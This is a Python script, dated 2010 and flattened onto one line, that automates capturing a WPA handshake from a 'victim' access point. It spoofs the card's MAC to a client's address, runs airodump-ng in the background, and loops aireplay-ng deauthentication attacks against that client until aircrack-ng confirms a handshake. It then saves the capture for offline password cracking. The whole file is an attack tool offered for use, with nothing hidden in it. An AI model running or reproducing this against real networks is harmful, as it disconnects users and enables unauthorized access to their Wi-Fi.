#!/usr/bin/env python # -*- coding: Utf-8 -*- ############################################### # # # AUTO WPA HANDSHAKE CAPTURE V0.3 # # # # CODED BY SH@M@N VIRTUEL / 2K10 # # # # GREETZ TO AIRCRACK-NG TEAM # # # ############################################### import optparse import threading from sys import argv,exit from os import getcwd from time import sleep from popen2 import popen3 #BACKGROUND CLASS FOR AIRODUMP-NG class Capture(threading.Thread): def __init__(self, card, chan, ap, cli): threading.Thread.__init__(self) self.card =card self.chan=chan self.ap=ap self.cli = cli def run(self): popen3("airodump-ng -w /tmp/autohs --bssid "+self.ap+" -c "+self.chan+" "+self.card+" ") #EXIT FUNCTION def clean(): popen3("killall -9 airodump-ng ") print "\n\tHOPE YOU HAD PHUN WITH AUTOHS\n\tGREYHATLY YOURS SH@M@N VIRTUEL\n" #VERIFY IF WE GOT AN HANDSHAKE def check_handshake(): try: r,w,e=popen3("aircrack-ng /tmp/autohs*.cap "); hs=True except KeyboardInterrupt: r.close();e.close();w.close() clean() for line in r.readlines(): if line.lower().find("0 handshake") != -1: hs=False if line.lower().find("no valid wpa handshake") != -1: hs=False if line.lower().find("no data") != -1: hs=False if line.lower().find("no networks found") != -1 : hs=False r.close();e.close();w.close() return hs #OPTIONS currdir=getcwd() parser = optparse.OptionParser(version="%prog 0.3") parser.add_option('-i', action="store",dest="card",help="Interface to use") parser.add_option('-c', action="store",dest="channel",help="Channel of Victim AP") parser.add_option('-b', action="store",dest="bssid",help="Mac of Victim AP") parser.add_option('-s', action="store",dest="client",help="Mac of Client Station") (options,args)=parser.parse_args() if len(argv)!=9: parser.print_help() exit(0) iter=0 #MAIN CODE print "\n\t###############################################" print "\t# #" print "\t# AUTO WPA HANDSHAKE CAPTURE V0.3 #" print "\t# #" print "\t# CODED BY SHAMANVIRTUEL / SV2K10 #" print "\t# #" print "\t# GREETZ TO AIRCRACK-NG TEAM #" print "\t# #" print "\t###############################################" try: import psyco psyco.profile() print "\n\tPSYCO OPTIMIZER LOADED" except ImportError: print "\n\tPSYCO OPTIMIZER NOT FOUND !!!! " print "\n\tKILLING ALL EXISTING AIRODUMP-NG THREADS..." popen3("killall -9 airodump-ng ") print "\n\tPURGING EXISTING OUTPUT FILES..."; popen3("rm -f ./handshake-"+options.bssid+"* ") popen3("rm -f /tmp/autohs* ") popen3("rm -f /tmp/autohs* ") print "\n\tSETTING CARD ON RIGHT CHANNEL & RATE..." popen3("ifconfig "+options.card+" down ") popen3("macchanger --mac "+options.client+" "+options.card+" ") popen3("ifconfig "+options.card+" up ") popen3("iwconfig "+options.card+" channel "+options.channel+" rate 1M ") print "\n\tLAUNCHING BACKGROUND CAPTURE TASK..." Capture(options.card, options.channel, options.bssid,options.client).start() sleep(1) while not check_handshake(): if iter==0: print "\n\tLAUNCHING ATTACK, PLEASE BE PATIENT..." else: print "\t * HANDSHAKE NOT CAPTURED., CONTINUING... (TRIED "+str(iter)+" TIMES)" popen3("aireplay-ng --deauth 1 -a "+options.bssid+" -c "+options.client+" "+options.card) popen3("aireplay-ng --deauth 1 -a "+options.bssid+" -c "+options.client+" "+options.card) iter+=1;sleep(1) popen3("mv -f /tmp/autohs-01.cap '"+currdir+"/handshake-"+options.bssid.replace(':','-')+".cap' ") print "\n\tHANDSHAKE CAPTURED & SAVED IN FILE (TRIED "+str(iter)+" TIMES) : \n\t"+currdir+"/handshake-"+options.bssid.replace(':','-')+".cap" clean()